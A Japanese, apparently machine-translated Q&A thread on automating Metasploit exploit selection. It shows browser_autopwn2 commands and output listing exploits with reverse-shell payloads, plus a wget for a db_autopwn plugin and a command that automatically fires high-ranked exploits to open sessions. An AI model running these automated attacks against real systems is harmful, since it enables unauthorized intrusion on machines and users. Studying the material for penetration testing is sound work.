web-dev-qa-db-ja.com

アーミテージ検索攻撃ツールcli同等のコマンド

私はcliを通してメタスプロイトを使用し、アーミテージを通して少し使用しました。動作する可能性が高い攻撃を与える攻撃を見つけるためのアーミテージのツールは非常に便利です。そのため、それを実行するためのcliコマンドが何であるかを考えていました。

それが存在しない場合は、モジュールをフィルタリングして最善の攻撃を見つけるための最良の方法は何ですか。明らかに、サービスやOSなどに基づいて検索とフィルターを使用していますが、他のモジュールと比較してどのモジュールが最も適しているかを知る方法がありません。

3
dmnte

Metasploitには以前、autopwnオプションがありましたが、これは探していることを実行しますが、ターゲットブラウザーのみを対象としています。ただし、アーミテージの名前が示すように、それは多数のエクスプロイトを選択し、ターゲットに発砲して最高のものを望みます。しかし、適切に行われなければ、悪用は善よりも害を及ぼす可能性があります。たとえば、SMB不正なターゲットが選択されたエクスプロイトは、修正するためにマシンを手動で再起動する必要があるSMBサービスをクラッシュさせる可能性があります。マシンを攻撃する人だけがセッションを取得することはできませんが、簡単に検出できます。これらの懸念に基づいて、autopwn機能は廃止されました。Metasploitには、ブラウザベースのエクスプロイトのみを対象とするAutoPwn2モジュールが含まれていますが、多くのよりスマートな方法です。これは、ターゲットが正しくフィンガープリントされ、モジュールがランクに基づいて起動される場合にのみエクスプロイトが発生するという意味で優れています。つまり、より信頼性の高いエクスプロイトが最初に試行されます。この方法で、フラッシュエクスプロイトをターゲットにしている場合、接続しているユーザーのアーキテクチャとOSの詳細について心配する必要はありません。モジュールがそれを処理します。

msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local Host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf auxiliary(browser_autopwn2) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Using URL: http://0.0.0.0:8080/

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_webidl_injection                   firefox/Shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         firefox/Shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         firefox/Shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  firefox/Shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             Android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      Android/meterpreter/reverse_tcp on 4443
 7      Great      Adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 8      Great      Adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      Adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 10     Great      Adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 11     Great      Adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      Adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      Adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 14     Great      Adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 15     Great      Adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 16     Great      Adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      Adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 18     Great      Adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 21     Good       Adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://x.x.x.x:8080/
[*] Server started.
2
void_in

Find Attacksのアーミテージコードを見ると、2011年に廃止されたMetasploit db_autopwnの古いオプションの独自のバージョンを実装しているようです。

ただし、このオプションの「最近」更新されたプラグイン(2017年8月)が見つかりました。ここにあります metasploit-db_autopwn

インストールするには、Metasploitsプラグインディレクトリ(Kali内:/usr/share/metasploit-framework/plugins/)に移動します。

次に、プラグインをダウンロードします。

wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

Metasploitを起動し、プラグインをロードします。

msf > load db_autopwn

オプションはdb_autopwn -hで確認できます

db_nmapを通常使用する場合と同様に、ホストをスキャンしてデータベースにロードします。

自動的にセッションを開く「素晴らしい」ランクのエクスプロイトをスキャンして実行する場合は、次のコマンドを実行できます。

msf > db_autopwn -p -R great -e -q

2
Sabe Barker

Msfconsoleには検索コマンドがあります。最初にsearch -h有効な構文があり、検索モジュールでは、cve、タイトル、プラットフォーム名などで検索するオプションがあります。フィルタリングする必要がある場合は、Linuxコンソールで使用するのと同じ方法でタブキーを使用します。自動補完オプションが表示されます。

この道路は、アーミテージ検索機能よりもはるかに手作業ですが、自分でそれらの攻撃を見つけるために時間を費やすと、アーミテージの[攻撃の検索]ボタンを押すよりも、実際のスキルが得られます。これが metaspoit db tutorial です。このガイドでは、dbを手動で起動する方法、他のツールからスキャンをインポートする方法などを説明しています。

実際のところ、エクスプロイトフェーズは情報収集フェーズに直接依存するため、エクスプロイトの喜びを自動ツールに限定しないでください。それらはmetasploit/armitageに含まれていないエクスプロイトがたくさんあり、それを「そこから」見つける必要があります。常に exploit database常にエクスプロイトを読み取り、それが何をするかを理解し、それを使用する前に、自分や他の人に危害を加えることができます

以上のことを踏まえると、良い狩猟です。

https://www.offensive-security.com/metasploit-unleashed/using-databases/

0
Sarastro